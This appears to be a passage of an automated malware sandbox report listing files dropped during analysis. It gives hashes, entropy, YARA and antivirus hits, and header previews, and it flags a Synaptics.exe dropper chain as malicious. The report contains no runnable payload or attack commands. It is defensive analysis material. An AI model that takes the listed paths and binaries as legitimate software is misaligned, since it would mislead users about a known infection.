                                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.2.0.<./.P.i.d.>.......

                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA441.tmp.xml

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4556
                                                                                                                                                                                  Entropy (8bit):4.44053755078757
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:cvIwSD8zsJJgtWI9TLWgc8sqYjz8fm8M4JFcF4s+q84GTm+ZVd:uITfbA6grsqYMJFs86+ZVd
                                                                                                                                                                                  MD5:30A47CA659D2F001C9D41BAA4A8369C7
                                                                                                                                                                                  SHA1:F29BCB524E226E1606A450E2E2B9366EBA51A2BB
                                                                                                                                                                                  SHA-256:887F5C49A39A5318BC5D9DBA9CF65F6E886DC80FDC261D0BC3575F2828B796EA
                                                                                                                                                                                  SHA-512:8016E1E6650692DB901F352DD22B10117B2ED8DA22DCB544F7CC80DCEE59B121E1E3A43E9C79DC111DD63B5C25D758F5E2F64148333F165E4F1D30E0134C5C90
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1533409" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                                                  C:\ProgramData\Synaptics\RCXCD96.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):771584
                                                                                                                                                                                  Entropy (8bit):6.644060003425038
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I4r:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                                                                                  MD5:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                  SHA1:B1E3866401ECA22981F985C17CB4CD9C36F85486
                                                                                                                                                                                  SHA-256:2B88A30E06873F61842038EC6C0E51B954DB482CD4641E33F01B3E80AF9F168D
                                                                                                                                                                                  SHA-512:ED72F56294BDF292A6EB1953CD657842CCFA2DCF3C5E69F24A1B11E19E5D8BD73DA5AAFB5F171CE91DBB07776CF8C2BF9028035E152E2CC8311A3CD21E51A886
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCXCD96.tmp, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\uniformerede.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1270272
                                                                                                                                                                                  Entropy (8bit):7.2217362129262685
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:TnsJ39LyjbJkQFMhmC+6GD9pYhK8VbNIf8gV2D:TnsHyjtk2MYC5GDwhKzy
                                                                                                                                                                                  MD5:FEDAD1ADEC8A1D90444051B5BDC6445D
                                                                                                                                                                                  SHA1:41AD10EE96250D8186D02E3D96923163CB664247
                                                                                                                                                                                  SHA-256:8B0667EC191E96C251FCE90FD0DEECCC09F1024F78FAF78B9FF32DED8B7CBB3D
                                                                                                                                                                                  SHA-512:303A40AC70E1E0BEDC08B55F5A0750A29F7E6EBCB55406293DD0F939D816CADC7FD0F6B604D607FD7478EB851A3648B1E5456CA51C971E494DA680FA44F5A8FE
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......t....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...t...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\76A735AA-7941-42FC-A093-50DC74F5224B

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):147717
                                                                                                                                                                                  Entropy (8bit):5.3591948483694365
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:gcQW/gxgB5B3guw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:SHQ9DQW+zIXLI
                                                                                                                                                                                  MD5:B6DC8D4E2DFF6941F586C5A9B70A2113
                                                                                                                                                                                  SHA1:921C12EDEBDF9568A219D466BE57A60B52F1CE39
                                                                                                                                                                                  SHA-256:7D4B72B2F6CB7F91F5B77DCEF0C9361B3F10AE6E6DF4FF4195DE0DFDA205B733
                                                                                                                                                                                  SHA-512:535D53BA0D44D6306C5C26386A15F3ACF3B9AD4CEE7BCF095C85F086C95DE84997A268B353D89B53B25CCF6EA415ECD48F26D2F7B53E6E6FFE35F3AF083FF764
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-05-27T02:38:11">.. Build: 16.0.15322.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):22204
                                                                                                                                                                                  Entropy (8bit):5.600843010610084
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:FtMjDPC0cpuZQuKr+pu5SYZ2jilJHVptQcvrg3MrBInYM05KfFRV7SJ3dK5ZQvnH:kguehpgmlJH/KW6waDiOp2O+H
                                                                                                                                                                                  MD5:9DC3A55F3E37D2EF2B4AEECA7114D94D
                                                                                                                                                                                  SHA1:B3F041B7C6B144EECEA599808D9CD54FE2B626BE
                                                                                                                                                                                  SHA-256:BE415E1129D4EBAF6A3E5DBF038CBBAC04CFD0DA620DA74467E2C316CC0FE27A
                                                                                                                                                                                  SHA-512:811712D2A4EEABABC78BE22C6842CA55673322E54695A7EECD6EC31CFF944B57495FC21D83FE8ABDD62271032574B1E33785F1B5E6120306DFF26AE4C1945EEB
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:@...e...........h...................L.K...}..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.4................Zg5..:O..g..q..........System.Xml..@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\6D6YYf5.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.263193514344487
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0MSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+z+pAZewRDK4mW
                                                                                                                                                                                  MD5:B5C49CC9E8DC5BB7979D44D737899DB3
                                                                                                                                                                                  SHA1:1CB0774BDC9C65E0A64F7FA8D823794C9D8A9161
                                                                                                                                                                                  SHA-256:D2FE0124264D63EA2EB3FF79940B41F1985012D54E84F3570C15EE9A1EB1EB48
                                                                                                                                                                                  SHA-512:6841EAED08CDD4C4BE9CC21046B1C2D93AFF0B7A34FE60A8361221B9144693E0EEA3B0A5830BCEBE6E8A333CCF515846643D590AF7B263CAC2F298D98234999F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UnOTan-iGx4fSwR8KWVDbQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\79Qsp1R.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.254010098815258
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0xySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+Ky+pAZewRDK4mW
                                                                                                                                                                                  MD5:4309ACA8FE965CECD1BE6514FFECE3B4
                                                                                                                                                                                  SHA1:7D3CB895EA60DF7EABC9F6782A550855CAA46B85
                                                                                                                                                                                  SHA-256:1333C16A831C61707FB22D3D5C0C5538697F404F5D48873946721B260A66963F
                                                                                                                                                                                  SHA-512:CAFC30C2070FA594DA4F88627A7AC9AA9B1CEC5C8BE24A42DCBF92B8B1F0E78A2DCE8CCBF402F1510A4EC446A7A683D7D84A0775DCFF29B6020473C424F5B0A2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uxH3n6qsdeVxHxiqEFvg1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9nIC29m.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.266160886679918
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0lWDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+ym+pAZewRDK4mW
                                                                                                                                                                                  MD5:B7701E37A612013DF67A0990CE2D81BC
                                                                                                                                                                                  SHA1:0814185B4905AEBCE392297D16D0CFCBC864E140
                                                                                                                                                                                  SHA-256:CE9010DF0F130D27BAE288151624008B28320FCC19690062AF3F7431538F7F73
                                                                                                                                                                                  SHA-512:3CAD5A2527F1C0F0AFABADDA57CA4BB39B3E4E956D0151D478DCC49FBE5FEA96FD74F383BE10E47DA7F45E34F607BF2964CF9CE4E1C970FE5949695A90AEA083
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BzfEXWApUaIy2onkKQoLTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\A74oXdM.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.262537312649583
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0ZySU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+b+pAZewRDK4mW
                                                                                                                                                                                  MD5:12084AEDF546294AFA8CB823217F89A1
                                                                                                                                                                                  SHA1:38F8AFC0D5FD9F242496295C97B53F353D171DDD
                                                                                                                                                                                  SHA-256:A6CF48D32BC467AA5B5A963653525AFF89DF1540289870BA462D4D9B8C46F169
                                                                                                                                                                                  SHA-512:C60DCCA7B8973A399442115C678B6E87BAFC0A5DED5C67566D92488DC3B94A95F1B470A189D9B86BC1B9BBD9758F3DBCA9EE5F24F181A8ADC143C5319FE30B2D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="AyQD7gHrQazz1KSmlkMQvg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\AEB8Tw9.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.260631526490981
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+w+pAZewRDK4mW
                                                                                                                                                                                  MD5:2EC6D02BC24F3CBCF138E77C18D63CE2
                                                                                                                                                                                  SHA1:4AF05824DF9A13E2B5516E620F724839CA4515BF
                                                                                                                                                                                  SHA-256:EA55864C1F586EEC4423D483518C866D583552A7B23783A7DD23BDDCCC63DFEA
                                                                                                                                                                                  SHA-512:AEDF9BA99E0F5CE5B6F05D2F14DAF861669A7322C2D89B70603509D0A6107EFE91DF3CC27E81CF0943EFC3D6498365350683CED44117975A9EE3545D8C158B2D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GoTjizcKOBGRGwE7giIZgg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Ap7UmLD.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.25999015877655
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0VSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                  MD5:CDAD74A4440693FE98FF06D1C92F8264
                                                                                                                                                                                  SHA1:04E96DB5A6D5DF6C8E6ABD706D9F85AFE32C1691
                                                                                                                                                                                  SHA-256:0CDA8EAA8B2B3B3C8CAED6449AFD34516F1AC6BD3EA2E3FE7853CA563F7BD624
                                                                                                                                                                                  SHA-512:6DED5DD7ECFF6E017839C772DFB464B815301496909178016DF7BADD8E6B42A31027C5B581B836FF5170437850F9E2CCBEC5841192ABFF0A3E998750752FD929
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HqInpAb4q-UA0p5Ap9EuAQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\CrVbcG3.ini

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1642
                                                                                                                                                                                  Entropy (8bit):5.265093555739085
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:bsF+0RSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+W+pAZewRDK4mW
                                                                                                                                                                                  MD5:40541C44E1A2C92BBB011980646390BD
                                                                                                                                                                                  SHA1:E8CB7690FAEEA6EB26377114E68AA888E08EDB5D
                                                                                                                                                                                  SHA-256:0945F65B1D726D99B2AF379BD9345FDF5CF72D90E67F41B0A2D196F7C9BBC0B9
                                                                                                                                                                                  SHA-512:1FBA270CA7A4FDF7EFF856F7460F6579399E4F9E53F78B4D58A0A47F6781601266C5C8DEFA349F157A8B4C44616D3E5B9C6695F5A7990D8DAB26F3518D872284
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XKD48708HUjfc2xAbsoU9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Forfrelses5.kni

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\._cache_uniformerede.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):387599
                                                                                                                                                                                  Entropy (8bit):7.923786371334464
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:zqGNqFRp81ckmvkdQ3Px8PjVWLAefmp88Q7YBy69ZrNlCTif9zUCIpkbrZFV:ea5svkdQfx8PjVWUem2YBy6LrNITiVzz
                                                                                                                                                                                  MD5:4AAB1798D3B3A95F833CB8A3EBBD45B5
                                                                                                                                                                                  SHA1:07C3BD47B41080B20A7D05543E8B055AD0CAA3E1
                                                                                                                                                                                  SHA-256:3B171F2E59DFDFDA8F1198FF352A15E65ADCED5F7148795369489179A58D6DB0
                                                                                                                                                                                  SHA-512:764B2D517ADA103BAC727775DCAE3F2AEF1E38649587EFF5A3D31E039E1E2C519054082F8EF508E71B3A32D5A2AAC531601867A3A3CF9D4BA5C677F47A01F32A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:bH..v.......f.O$4.:qMo.2..d....VY]..=....R.T.jL..]kRI)...../.=p....w..v.a.o.mE.9.m|.F.v..D..!SLG.Ry.%...u......W.....J{.?.']PE....!9k.dk...CbY.q....V$.rw:..?Ex...(.:.b.d<.hi.....:.:.x,Y. ....N3.1..A...y.......b....D._.j.vw...........f2........c(.g.u...f9I.5.....N...{.{.\.G.... 2x.I.i..p<4MI......H.T...K..{...P.3t3..;. .V[NhAj...4..D.....ZS...a#.(..~...\l.l.$.Ia.....L....{/.S..{r.\...O.B-.F....s....^J.#.H...V..u..vc.%.K.}.PQB...t.q..+[..]@pClf2...r:..c..._@..,a:.MN.......k...ER.c.....%._bj.s.2V,.U....I....e.[....z..o+..0A.#.@4...1,.d.........K.tO.+.xf"....Y.i.%....X..nk.....z.5.!xq.{.....TP......l['...c%f..s.,.......x..{..6m.~[&.'{p......|.N.9...n,..$:]"..r....Z....k.a..<.p..\...^8\*...k..H(]...4.6..c.A.S}...n(I.p..)|:..h.R6..6..!.v......? ...ar..."_...vCA.qsH.f..g...Y)......0<U.V..~....B.R(a.&.:s..q..{jU41x.b...`...9.s;.6..C8...x.......X......v.;w.A.O.....P6M...P.6h....{....z.@G........Zs...j.p&./..|2.AM....O,...HU?.D#2..(..N=.._m.}.$g.^.z...yzV

